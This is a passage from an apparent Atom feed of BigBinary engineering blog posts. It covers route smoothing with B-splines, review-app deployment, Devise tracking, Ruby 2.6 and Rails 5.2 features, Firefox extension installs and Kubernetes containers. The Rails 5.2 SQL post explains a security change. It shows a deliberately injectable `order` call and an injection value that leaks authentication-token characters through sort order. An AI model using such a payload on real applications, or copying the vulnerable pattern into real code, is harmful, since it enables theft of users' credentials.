anymore. Here's how it looks now.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/sampled_routes.png" alt="Sampled routes"><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/contiguous_routes.png" alt="Contiguous routes"></p><p>Note that we sampled route points till single decimal point. Notice that theroutes in which we did sampling appears to be jagged instead of contiguous. Wecan solve this by using a curve fitting method to create a curve from thediscrete points we have.</p><h2>Curve fitting using B-spline function</h2><p><a href="https://en.wikipedia.org/wiki/B-spline">B-spline</a> or basis spline is a splinefunction which can be used for creating smooth curves best fitted to a set ofcontrol points. Here's an example of a B-spline curve created from a set ofcontrol points.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/bspline_example.png" alt="Bspline example"></p><p>We changed our previous example to use B-spline function to generate latitudeand longitude points.</p><pre><code class="language-javascript">// List of latitude and longitudelet lats = points.map(point =&gt; point.lat);let lngs = points.map(point =&gt; point.lng);let path = bspline(lats, lngs);let route_options = {  path: path,  strokeColor: color,  strokeOpacity: 1.0,  strokeWeight: mapAttributes.strokeWeight || 3,  map: map, // instance of google.maps.Map};new google.maps.Polyline(route_options);</code></pre><pre><code class="language-javascript">function bspline(lats, lngs) {  let i, t, ax, ay, bx, by, cx, cy, dx, dy, lat, lng, points;  points = [];  for (i = 2; i &lt; lats.length - 2; i++) {    for (t = 0; t &lt; 1; t += 0.2) {      ax = (-lats[i - 2] + 3 * lats[i - 1] - 3 * lats[i] + lats[i + 1]) / 6;      ay = (-lngs[i - 2] + 3 * lngs[i - 1] - 3 * lngs[i] + lngs[i + 1]) / 6;      bx = (lats[i - 2] - 2 * lats[i - 1] + lats[i]) / 2;      by = (lngs[i - 2] - 2 * lngs[i - 1] + lngs[i]) / 2;      cx = (-lats[i - 2] + lats[i]) / 2;      cy = (-lngs[i - 2] + lngs[i]) / 2;      dx = (lats[i - 2] + 4 * lats[i - 1] + lats[i]) / 6;      dy = (lngs[i - 2] + 4 * lngs[i - 1] + lngs[i]) / 6;      lat =        ax * Math.pow(t + 0.1, 3) +        bx * Math.pow(t + 0.1, 2) +        cx * (t + 0.1) +        dx;      lng =        ay * Math.pow(t + 0.1, 3) +        by * Math.pow(t + 0.1, 2) +        cy * (t + 0.1) +        dy;      points.push(new google.maps.LatLng(lat, lng));    }  }  return points;}</code></pre><p>Source:<a href="https://johan.karlsteen.com/2011/07/30/improving-google-maps-polygons-with-b-splines/">https://johan.karlsteen.com/2011/07/30/improving-google-maps-polygons-with-b-splines</a></p><p>After the change the plotted routes are much better. Here's how it looks now.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/bspline_routes.png" alt="Bspline routes"><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/contiguous_routes.png" alt="Contiguous routes"></p><p>The only downside here is that if we zoom in the map we'll notice that theroutes are not exactly overlapping the Google map paths. Otherwise we're able toplot almost same routes with sampled route points. However we still need 6.5seconds to load 500 deliveries. How do we fix that ?</p><h2>Loading deliveries in batches</h2><p>Sometimes users have up to 500 deliveries but they want to change only a fewdeliveries and then use the application. Right now the way application is setupusers have no choice but to wait until all 500 deliveries are loaded and thenonly they would be able to change a few deliveries. This is not ideal.</p><p>We want to show deliveries as soon as they're loaded. We added a pollingmechanism that would load batches of 20 deliveries and as soon as a batch isloaded we would plot them on the map. This way user could interact with theloaded deliveries while the remaining deliveries are still being loaded.</p><pre><code class="language-javascript">  loadDeliveriesWindow(updatedState = {}, lastPage = 0, currentWindow = 1) {    // windowSize: Size of the batch to be loaded    // perPage: No of deliveries per page    const { perPage, windowSize } = this.state;    if (currentWindow &gt; perPage / windowSize) {      // Streaming deliveries ended      this.setState($.extend(updatedState, { windowStreaming: false }));      return;    }    if (currentWindow === 1) {      // Streaming deliveries started      this.setState({ windowStreaming: true });    }    // Gets delivery data from backend    this.fetchDeliveries(currentWindow + (lastPage * windowSize), queryParams).complete(() =&gt; {      // Plots deliveries on map      this.loadDeliveries();      // Load the next batch of deliveries      setTimeout((() =&gt; {        this.loadDeliveriesWindow(updatedState, lastPage, currentWindow + 1);      }).bind(this, currentWindow, updatedState, lastPage), 100);    });  }</code></pre><p>Here's a comparison of how the user experience changed.</p><p><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/streaming_deliveries.gif" alt="Streaming deliveries"><img src="/blog_images/2018/using-bspline-curves-to-draw-sampled-route-points-on-google-maps/normal_loading.gif" alt="Normal loading"></p><p>Notice that loaded deliveries are instantly plotted and user can startinteracting with them. While if we load all the deliveries before plotting themthe user has to wait for all of them to be loaded. This made the user experiencemuch better if the user loaded more than 100 deliveries.</p><h2>Serializing route points list without brackets</h2><p>One more optimization we did was to change how route points are beingserialized.</p><p>The route points after serialization contained opening and closing squarebrackets. So let's say the route points are</p><p><code>[[25.57167, -80.421271], [25.676544, -80.388611], [25.820025, -80.386488],...]</code>.</p><p>After serialization they looked like</p><p><code>[[25.57167,-80.421271], [25.676544,-80.388611], [25.820025,-80.386488],...]</code>.</p><p>For each route point we've an extra opening and closing square bracket which canbe avoided.</p><p>We could get rid of the brackets by concatenating the route points array andconverting it to a string. After conversion it looked like this.</p><p><code>&quot;25.57167,-80.421271|25.676544,-80.388611|25.820025,-80.386488|...&quot;</code></p><p>At the client side we converted it back to an array. This reduced the payloadsize by 0.2MB for dense routes.</p><p>Note this is a trade off between client side processing and network bandwidth.In modern computers the client side processing will be negligible. For ourclients, network bandwidth was a crucial resource so we optimized it for networkbandwidth.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Deploying feature branches to have a review app]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-feature-branches-to-have-a-review-app"/>
      <updated>2018-11-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-feature-branches-to-have-a-review-app</id>
      <content type="html"><![CDATA[<p><em>BigBinary has been working with <a href="https://gumroad.com">Gumroad</a> for a while.Following blog post has been posted with permission from Gumroad and we are verygrateful to <a href="https://twitter.com/shl">Sahil</a> for allowing us to discuss the workin such an open environment.</em></p><p>Staging environment helps us in testing the code before pushing the code toproduction. However it becomes hard to manage the staging environment when morepeople work on different parts of the application. This can be solved byimplementing a system where feature branch can have its own individual stagingenvironment.</p><p>Heroku has<a href="https://devcenter.heroku.com/articles/github-integration-review-apps">Review Apps feature</a>which can deploy different branches separately. <a href="https://gumroad.com">Gumroad</a>,doesn't use Heroku so we built a custom in-house solution.</p><p>The first step was to build the infrastructure. We created a new Auto ScalingGroup, Application Load Balancer and route in AWS for the review apps. Loadbalancer and route are common for all review apps, but a new EC2 instance iscreated in the ASG when a new review app is commissioned.</p><p>![review app architecture](/blog_images/image review_app_architecture.jpg)</p><p>The main challenge was to forward the incoming requests to the correct serverrunning the review app. This was made possible using<a href="https://www.nginx.com/resources/wiki/modules/lua/">Lua in nginx</a> and<a href="https://www.consul.io/">consul</a>. When a review app is deployed, it writes itsIP and port to consul along with the hostname. Each review app server runs aninstance of <a href="https://openresty.org/en/">OpenResty</a> (Nginx + Lua modules) withthe following configuration.</p><pre><code class="language-bash">server {  listen                   80;  server_name              _;  server_name_in_redirect  off;  port_in_redirect         off;  try_files $uri/index.html $uri $uri.html @app;  location @app {    set $upstream &quot;&quot;;    rewrite_by_lua '      http   = require &quot;socket.http&quot;      json   = require &quot;json&quot;      base64 = require &quot;base64&quot;      -- read upstream from consul      host          = ngx.var.http_host      body, c, l, h = http.request(&quot;http://172.17.0.1:8500/v1/kv/&quot; .. host)      data          = json.decode(body)      upstream      = base64.decode(data[1].Value)      ngx.var.upstream = upstream    ';    proxy_buffering   off;    proxy_set_header  Host $host;    proxy_set_header  X-Forwarded-For $proxy_add_x_forwarded_for;    proxy_redirect    off;    proxy_pass        http://$upstream;  }}</code></pre><p>It forwards all incoming requests to the correct IP:PORT after looking up inconsul with the hostname.</p><p>The next task was to build a system to deploy the review apps to thisinfrastructure. We were already using docker in both production and stagingenvironments. We decided to extend it to deploy branches by building dockerimage for every branch with <code>deploy-</code> prefix in the branch name. When such abranch is pushed to GitHub, a CircleCI job is run to build a docker image withthe code and all the necessary packages. This can be configured using aconfiguration template like this.</p><pre><code class="language-yaml">jobs:  build_image:    &lt;&lt;: *defaults    parallelism: 2    steps:      - checkout      - setup_remote_docker:          version: 17.09.0-ce      - run:          command: |            ci_scripts/2.0/build_docker_image.sh          no_output_timeout: 20mworkflows:  version: 2  web_app:    jobs:      - build_image:          filters:            branches:              only:                - /deploy-.*/</code></pre><p>It also pushes static assets like JavaScript, CSS and images to an S3 bucketfrom where they are served directly through CDN. After building the dockerimage, another CircleCI job is run to do the following tasks.</p><ul><li>Create a new database in RDS and configure the required credentials.</li><li>Scale up Review App's Auto Scaling Group by increasing the number of desiredinstances by 1.</li><li>Run redis, database migration, seed-data population, unicorn and resqueinstances using <a href="https://nomadproject.io">nomad</a>.</li></ul><p>The ease of deploying a review app helped increase our productivity.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Skipping devise trackable module for API calls]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/skip-devise-trackable-module-for-api-calls"/>
      <updated>2018-10-30T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/skip-devise-trackable-module-for-api-calls</id>
      <content type="html"><![CDATA[<p>We use devise gem for authentication in one of our applications.This application provides an API which usestoken authentication provided by the devise gem.</p><p>We were authenticating the userusing auth tokenfor every API call.</p><pre><code class="language-ruby">class Api::V1::BaseController &lt; ApplicationController  before_action :authenticate_user_using_x_auth_token  before_action :authenticate_user!  def authenticate_user_using_x_auth_token    user_email = params[:email].presence || request.headers['X-Auth-Email']    auth_token = request.headers['X-Auth-Token'].presence    @user = user_email &amp;&amp; User.find_by(email: user_email)    if @user &amp;&amp; Devise.secure_compare(@user.authentication_token, auth_token)      sign_in @user, store: false    else      render_errors('Could not authenticate with the provided credentials', 401)    end  endend</code></pre><p>Everything was working smoothly initially, but we started noticingsignificant reduction in the response timesduring peak hours after a few months.</p><p>Because of the nature of the business, the application gets API callsfor every user after every minute.Sometimes the application also get concurrent API calls for the same user.We noticed that in such cases, the users table was getting lockedduring the authentication process.This was resulting intocascading holdups and timeouts as it was affecting other API calls whichwere also accessing the users table.</p><p>After looking at the monitoring information,we found that the problem was happening due to the <code>trackable</code> moduleof devise gem.The <code>trackable</code> module keeps track of the user by storing the sign in time, signin count and IP address information.Following queries were running for every API call and were resulting into exclusive locks onthe users table.</p><pre><code class="language-sql">UPDATE users SET last_sign_in_at = '2018-01-09 04:55:04',current_sign_in_at = '2018-01-09 04:55:05',sign_in_count = 323,updated_at = '2018-01-09 04:55:05'WHERE users.id = $1</code></pre><p>To fix this issue, we decided to skip the user trackingfor the API calls. We don't need to track the useras every call is stateless and every request authenticates the user.</p><p>Devise provides a hook to achieve this for certain requests throughthe environment of the request.As we were already using a separate base controller for APIrequests, it was easy to skip it for all API calls at once.</p><pre><code class="language-ruby">class Api::V1::BaseController &lt; ApplicationController  before_action :skip_trackable  before_action :authenticate_user_using_x_auth_token  before_action :authenticate_user!  def skip_trackable    request.env['warden'].request.env['devise.skip_trackable'] = '1'  endend</code></pre><p>This fixed the issue of exclusive locks on the users table caused by thetrackable module.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 Range#cover? accepts Range object as argument]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-range-cover-now-accepts-range-object"/>
      <updated>2018-10-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-range-cover-now-accepts-range-object</id>
      <content type="html"><![CDATA[<p><code>Range#cover?</code> returns true if the object passed as argument is in the range.</p><pre><code class="language-ruby">(1..10).cover?(5)=&gt; true</code></pre><p><code>Range#cover?</code> returns false if the object passed as an argument isnon-comparable or is not in the range.</p><p>Before Ruby 2.6, <code>Range#cover?</code> used to return false if a Range object is passedas an argument.</p><pre><code class="language-ruby">&gt;&gt; (1..10).cover?(2..5)=&gt; false</code></pre><h4>Ruby 2.6</h4><p>In Ruby 2.6 <code>Range#cover?</code> can accept a Range object as an argument. It returnstrue if the argument Range is equal to or a subset of the Range.</p><pre><code class="language-ruby">(1..100).cover?(10..20)=&gt; true(1..10).cover?(2..5)=&gt; true(5..).cover?(4..)=&gt; false(&quot;a&quot;..&quot;d&quot;).cover?(&quot;x&quot;..&quot;z&quot;)=&gt; false</code></pre><p>Here is relevant<a href="https://github.com/ruby/ruby/commit/9ca738927293df1c7a2a1ed7e2d6cf89527b5438">commit</a>and <a href="https://bugs.ruby-lang.org/issues/14473">discussion</a> for this change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 DSL for configuring Content Security Policy]]></title>
       <author><name>Sushant Mittal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-adds-dsl-for-configuring-content-security-policy-header"/>
      <updated>2018-10-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-adds-dsl-for-configuring-content-security-policy-header</id>
      <content type="html"><![CDATA[<p>Content Security Policy (CSP) is an added layer of security that helps to detectand mitigate various types of attacks on our web applications, including CrossSite Scripting (XSS) and data injection attacks.</p><h2>What is XSS ?</h2><p>In this attack, victim's browser may execute malicious scripts because browsertrusts the source of the content even when it's not coming from the correctsource.</p><p><a href="https://blog.bigbinary.com/2012/05/10/xss-and-rails.html">Here is</a> our blog onXSS written sometime back.</p><h2>How CSP can be used to mitigate and report this attack ?</h2><p>By using CSP, we can specify domains that are valid sources of executablescripts. Then a browser with CSP compatibility will only execute those scriptsthat are loaded from these whitelisted domains.</p><p>Please note that CSP makes XSS attack a lot harder but CSP does not make XSSattack impossible. CSP does not stop DOM-based XSS (also known as client-sideXSS). To prevent DOM-based XSS, Javascript code should be carefully written toavoid introducing such vulnerabilities.</p><p>In Rails 5.2, <a href="https://github.com/rails/rails/pull/31162">a DSL was added</a> forconfiguring Content Security Policy header.</p><h2>Let's check the configuration.</h2><p>We can define global policy for the project in an initializer.</p><pre><code class="language-ruby"># config/initializers/content_security_policy.rbRails.application.config.content_security_policy do |policy|policy.default_src :self, :httpspolicy.font_src :self, :https, :datapolicy.img_src :self, :https, :datapolicy.object_src :nonepolicy.script_src :self, :httpspolicy.style_src :self, :https, :unsafe_inlinepolicy.report_uri &quot;/csp-violation-report-endpoint&quot;end</code></pre><p>We can override global policy within a controller as well.</p><pre><code class="language-ruby"># Override policy inlineclass PostsController &lt; ApplicationControllercontent_security_policy do |policy|policy.upgrade_insecure_requests trueendend</code></pre><pre><code class="language-ruby"># Using mixed static and dynamic valuesclass PostsController &lt; ApplicationControllercontent_security_policy do |policy|policy.base_uri :self, -&gt; { &quot;https://#{current_user.domain}.example.com&quot; }endend</code></pre><h2>Content Security Policy can be deployed in report-only mode as well.</h2><p>Here is global setting in an initializer.</p><pre><code class="language-ruby"># config/initializers/content_security_policy.rbRails.application.config.content_security_policy_report_only = true</code></pre><p>Here we are putting an override at controller level.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationControllercontent_security_policy_report_only only: :indexend</code></pre><p>Policy specified in <code>content_security_policy_report_only</code> header will not beenforced, but any violations will be reported to a provided URI. We can providethis violation report URI in <code>report_uri</code> option.</p><pre><code class="language-ruby"># config/initializers/content_security_policy.rbRails.application.config.content_security_policy do |policy|policy.report_uri &quot;/csp-violation-report-endpoint&quot;end</code></pre><p>If both <code>content_security_policy_report_only</code> and <code>content_security_policy</code>headers are present in the same response then policy specified in<code>content_security_policy</code> header will be enforced while<code>content_security_policy_report_only</code> policy will generate reports but will notbe enforced.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5.2 stops some raw SQL, prevents SQL injections]]></title>
       <author><name>Piyush Tiwari</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-2-disallows-raw-sql-in-active-record"/>
      <updated>2018-10-16T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-2-disallows-raw-sql-in-active-record</id>
      <content type="html"><![CDATA[<p>We sometimes use raw SQL in Active Record methods. This can lead to<a href="https://en.wikipedia.org/wiki/SQL_injection">SQL injection</a> vulnerabilitieswhen we unknowingly pass unsanitized user input to the Active Record method.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    User.order(&quot;#{params[:order]} ASC&quot;)  endend</code></pre><p>Although this code is looking fine on the surface, we can see the issues lookingat the example from <a href="http://rails-sqli.org/">rails-sqli</a>.</p><pre><code class="language-ruby">pry(main)&gt; params[:order] = &quot;(CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END)&quot;pry(main)&gt; User.order(&quot;#{params[:order]} ASC&quot;)User Load (1.0ms)  SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY (CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END) ASC=&gt; [#&lt;User:0x00007fdb7968b508  id: 1,  email: &quot;piyush@example.com&quot;,  authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]</code></pre><p>There are many Active Record methods which are vulnerable to SQL injection andsome of these can be found <a href="http://rails-sqli.org/"><code>here</code></a>.</p><p>However, in Rails 5.2 these APIs are changed and they allow only attributearguments and Rails does not allow raw SQL. With Rails 5.2 it is not mandatorybut the developer would see a deprecation warning to remind about this.</p><pre><code class="language-ruby">irb(main):004:0&gt; params[:order] = &quot;email&quot;=&gt; &quot;email&quot;irb(main):005:0&gt; User.order(params[:order])  User Load (1.0ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; ORDER BY email LIMIT $1  [[&quot;LIMIT&quot;, 11]]=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, email: &quot;piyush@example.com&quot;, authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]&gt;irb(main):008:0&gt; params[:order] = &quot;(CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END)&quot;irb(main):008:0&gt; User.order(&quot;#{params[:order]} ASC&quot;)DEPRECATION WARNING: Dangerous query method (method whose arguments are used as raw SQL) called with non-attribute argument(s): &quot;(CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END)&quot;. Non-attribute arguments will be disallowed in Rails 6.0. This method should not be called with user-provided values, such as request parameters or model attributes. Known-safe values can be passed by wrapping them in Arel.sql(). (called from irb_binding at (irb):8)  User Load (1.2ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; ORDER BY (CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END) ASC=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, email: &quot;piyush@example.com&quot;, authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]&gt;</code></pre><p>In Rails 6, this will result into an error.</p><p>In Rails 5.2, if we want to run raw SQL without getting the above warning, wehave to change raw SQL string literals to an <code>Arel::Nodes::SqlLiteral</code> object.</p><pre><code class="language-ruby">irb(main):003:0&gt; Arel.sql('title')=&gt; &quot;title&quot;irb(main):004:0&gt; Arel.sql('title').class=&gt; Arel::Nodes::SqlLiteralirb(main):006:0&gt; User.order(Arel.sql(&quot;#{params[:order]} ASC&quot;))  User Load (1.2ms)  SELECT  &quot;users&quot;.* FROM &quot;users&quot; ORDER BY (CASE SUBSTR(authentication_token, 1, 1) WHEN 'k' THEN 0 else 1 END) ASC=&gt; #&lt;ActiveRecord::Relation [#&lt;User id: 1, email: &quot;piyush@example.com&quot;, authentication_token: &quot;Vkn5jpV_zxhqkNesyKSG&quot;&gt;]&gt;</code></pre><p>This should be done with care and should not be done with user input.</p><p>Here is relevant <a href="https://github.com/rails/rails/pull/27947/files">commit</a> and<a href="https://github.com/rails/rails/pull/27947">discussion</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.6 adds RubyVM::AST module]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-6-adds-rubyvm-ast-module"/>
      <updated>2018-10-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-6-adds-rubyvm-ast-module</id>
      <content type="html"><![CDATA[<p>Ruby 2.6 added <code>RubyVM::AST</code> to generate the<a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree">Abstract Syntax Tree</a> ofcode. Please note, this feature is experimental and under active development.</p><p>As of now, <code>RubyVM::AST</code> supports two methods: <code>parse</code> and <code>parse_file</code>.</p><p><code>parse</code> method takes a string as a parameter and returns the root node of thetree in the form of the object, RubyVM::AST::Node (Link is not available).</p><p><code>parse_file</code> method takes the file name as a parameter and returns the root nodeof the tree in the form of the object,<a href="https://ruby-doc.org/core-2.6.0.preview2/RubyVM/AST/Node.html">RubyVM::AST::Node</a>.</p><h4>Ruby 2.6.0-preview2</h4><pre><code class="language-ruby">irb&gt; RubyVM::AST.parse(&quot;(1..100).select { |num| num % 5 == 0 }&quot;)=&gt; #&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;irb&gt; RubyVM::AST.parse_file(&quot;/Users/amit/app.rb&quot;)=&gt; #&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;</code></pre><p><a href="https://ruby-doc.org/core-2.6.0.preview2/RubyVM/AST/Node.html">RubyVM::AST::Node</a>has seven public instance methods - <code>children</code>, <code>first_column</code>, <code>first_lineno</code>,<code>inspect</code>, <code>last_column</code>, <code>last_lineno</code> and <code>type</code>.</p><h4>Ruby 2.6.0-preview2</h4><pre><code class="language-ruby">irb&gt; ast_node = RubyVM::AST.parse(&quot;(1..100).select { |num| num % 5 == 0 }&quot;)=&gt; #&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;irb&gt; ast_node.children=&gt; [nil, #&lt;RubyVM::AST::Node(NODE_ITER(9) 1:0, 1:38): &gt;]irb&gt; ast_node.first_column=&gt; 0irb&gt; ast_node.first_lineno=&gt; 1irb&gt; ast_node.inspect=&gt; &quot;#&lt;RubyVM::AST::Node(NODE_SCOPE(0) 1:0, 1:38): &gt;&quot;irb&gt; ast_node.last_column=&gt; 38irb&gt; ast_node.last_lineno=&gt; 1irb&gt; ast_node.type=&gt; &quot;NODE_SCOPE&quot;</code></pre><p>This module will majorly help in building a static code analyzer and formatter.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Inline Installation of Firefox Extension]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/inline-installation-of-firefox-extension"/>
      <updated>2018-09-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/inline-installation-of-firefox-extension</id>
      <content type="html"><![CDATA[<h2>Inline Installation</h2><p>Firefox extensions,similar to Chrome extensions,help us modifyandpersonalize our browsing experienceby adding new featuresto the existing sites.</p><p>Once we've publishedour extension to the<a href="https://addons.mozilla.org/">Mozilla's Add-on store(AMO)</a>,users who browse the AMOcan find the extensionand install it with one-click.But,if a user is already on our sitewhere a link is providedto the extension's AMO listing page,they would need tonavigate away from ourwebsite to the AMO,complete the install process,and then return back to our site.That is a bad user experience.</p><p>The inline installation enables us toinitiate the extension installationfrom our site.The extension can still be hosted on the AMObut userswould no longer have toleave our site to install it.</p><p>We had to try out a few suggested approachesbefore we got it working.</p><h2>InstallTrigger</h2><p><code>InstallTrigger</code> (Link is not available)is an interfaceincluded in the Mozilla's Apps APIfor installing extensions.Using JavaScript,the <code>install</code> methodof <code>InstallTrigger</code> can be usedto start the download and installationof an extension (or anything packaged in a .xpi file)from a Web page.</p><p>A XPI(pronounced as &quot;zippy&quot;)is similar to a zip file,which contains manifest file andthe install script for the extension.</p><p>So, let's try to install theGrammarly Extension for Firefox.To use it,we first need its .xpi file's location.Once we have published our extension on the AMO,we can navigate to the listings pagefor it and get the link for the .xpi.</p><p>For our present example,here's the listing page for<a href="https://addons.mozilla.org/en-US/firefox/addon/grammarly-1/">Grammarly Extension</a>.</p><p>Here,we can get the .xpi file's locationby right clicking on the<code>+ Add to Firefox</code> buttonand clicking on <code>Copy Link Location</code>.Note that the <code>+ Add to Firefox</code> buttonwould only be visibleif we browse the link on a Firefox browser.Otherwise, it would be replaced bya <code>Get Firefox Now</code> button.</p><p>Once we have the URL,we can trigger the installation via JavaScripton our web page.</p><pre><code class="language-javascript">InstallTrigger.install({  &quot;Name of the Extension&quot;: {    URL: &quot;url pointing to the .xpi file's location on AMO&quot;,  },});</code></pre><h2>Pointing to the latest version of the Extension</h2><p>When we used the URL in the above code,the .xpi file's URLwas specific to the extension's current version.If the extension has an update,the installed extensions for existing userswould be updated automatically.But the URL to the .xpi on our websitewould be pointing to the older version.Although the old link would still work,we would always want new users to downloadthe latest version.</p><p>To do that,we can either fetch the listing pagein the background and parse the HTMLto get the latest link.But that approach can break if the HTML changes.</p><p>Or we can query the Addons Services API,which returns the information for the extension in XML format.</p><p>For the Grammarly Extension, we first need its slug-id.We can get it by looking at its listing page's URL.From <code>https://addons.mozilla.org/en-US/firefox/addon/grammarly-1/</code>,we can note down the slug which is <code>grammarly-1</code></p><p>Using this slug id, we can now get the extension details using<code>https://services.addons.mozilla.org/en-US/firefox/api/1.5/addon/grammarly-1</code>.It returns the info for the Grammarly Extension.What we are particularly interested in is the value in the <code>&lt;install&gt;</code> node.That is what the desired value is for the latest version for our .xpi.</p><p>Let's see how we can implement the whole thing using React.</p><pre><code class="language-javascript">import axios from &quot;axios&quot;;import cheerio from &quot;cheerio&quot;;const FALLBACK_GRAMMARLY_EXTENSION_URL =  &quot;https://addons.mozilla.org/firefox/downloads/file/1027073/grammarly_for_firefox-8.828.1757-an+fx.xpi&quot;;const URL_FOR_FETCHING_XPI = `https://services.addons.mozilla.org/en-US/firefox/api/1.5/addon/grammarly-1`;export default class InstallExtension extends Component {  state = {    grammarlyExtensionUrl: FALLBACK_GRAMMARLY_EXTENSION_URL,  };  componentWillMount() {    axios.get(URL_FOR_FETCHING_XPI).then((response) =&gt; {      const xml = response.data;      const $ = cheerio.load(xml);      const grammarlyExtensionUrl = $(&quot;addon install&quot;).text();      this.setState({ grammarlyExtensionUrl });    });  }  triggerInlineInstallation = (event) =&gt; {    InstallTrigger.install({      Grammarly: { URL: this.state.grammarlyExtensionUrl },    });  };  render() {    return (      &lt;Button onClick={this.triggerInlineInstallation}&gt;        Install Grammarly Extension      &lt;/Button&gt;    );  }}</code></pre><p>In the above code,we are using the npm packages<a href="https://github.com/axios/axios">axios</a>for fetching the xml and<a href="https://github.com/cheeriojs/cheerio">cheerio</a>for parsing the xml.Also, we have set a fallback URL as the initial valuein case the fetching of the new URLfrom the xml response fails.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Use parametrized containers to deploy Rails microservices]]></title>
       <author><name>Rahul Mahale</name></author>
      <link href="https://www.bigbinary.com/blog/deploying-rails-applications-with-parmaetrized-containers"/>
      <updated>2018-09-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploying-rails-applications-with-parmaetrized-containers</id>
      <content type="html"><![CDATA[<p>When using micro services with containers, one has to consider <strong>modularity</strong>and <strong>reusability</strong> while designing a system.</p><p>While using Kubernetes as a distributed system for container deployments,modularity and reusability can be achieved using parameterizing containers todeploy micro services.</p><h2>Parameterized containers</h2><p>Assuming container as a function in a program, how many parameters does it have?Each parameter represents an input that can customize a generic container to aspecific situation.</p><p>Let's assume we have a Rails application isolated in services like puma,sidekiq/delayed-job and websocket. Each service runs as a separate deployment ona separate container for the same application. When deploying the change weshould be building the same image for all the three containers but they shouldbe different function/processes. In our case, we will be running 3 pods with thesame image. This can be achieved by building a generic image for containers. TheGeneric container must be accepting parameters to run different services.</p><p>We need to expose parameters and consume them inside the container. There aretwo ways to pass parameters to our container.</p><ol><li>Using environment variables.</li><li>Using command line arguments.</li></ol><p>In this article, we will use environment variables to run parameterizedcontainers like puma, sidekiq/delayed-job and websocket for Rails applicationson kubernetes.</p><p>We will deploy <a href="https://github.com/bigbinary/wheel">wheel</a> on kubernetes usingparametrized container approach.</p><h4>Pre-requisite</h4><ul><li><p>Understanding of<a href="https://docs.docker.com/engine/reference/builder/">Dockerfile</a> and imagebuilding.</p></li><li><p>Access to working kubernetes cluster.</p></li><li><p>Understanding of <a href="http://kubernetes.io/">Kubernetes</a> terms like<a href="http://kubernetes.io/docs/user-guide/pods/">pods</a>,<a href="http://kubernetes.io/docs/user-guide/deployments/">deployments</a>,<a href="https://kubernetes.io/docs/concepts/services-networking/service/">services</a>,<a href="https://kubernetes.io/docs/tasks/configure-pod-container/configure-pod-configmap/">configmap</a>,and<a href="https://kubernetes.io/docs/concepts/overview/working-with-objects/annotations/">annotations</a>.</p></li></ul><h3>Building a generic container image.</h3><p>Dockerfile (Link is not available) in wheel uses bash script<code>setup_while_container_init.sh</code> as a command to start a container. The script isself-explanatory and, as we can see, it consists of two functions <code>web</code> and<code>background</code>. Function <code>web</code> starts the puma service and <code>background</code> starts thedelayed_job service.</p><p>We create two different deployments on kubernetes for web and backgroundservices. Deployment templates are identical for both web and background. Thevalue of environment variable <code>POD_TYPE</code> to init-script runs the particularservice in a pod.</p><p>Once we have docker image built, let's deploy the application.</p><h3>Creating kubernetes deployment manifests for wheel application</h3><p>Wheel uses PostgreSQL database and we need postgres service to run theapplication. We will use the postgres image from docker hub and will deploy itas deployment.</p><p><strong>Note:</strong> For production deployments, database should be deployed as astatefulset or use managed database services.</p><p>K8s manifest for deploying PostgreSQL.</p><pre><code class="language-yaml">---apiVersion: extensions/v1beta1kind: Deploymentmetadata:  labels:    app: db  name: dbspec:  replicas: 1  template:    metadata:      labels:    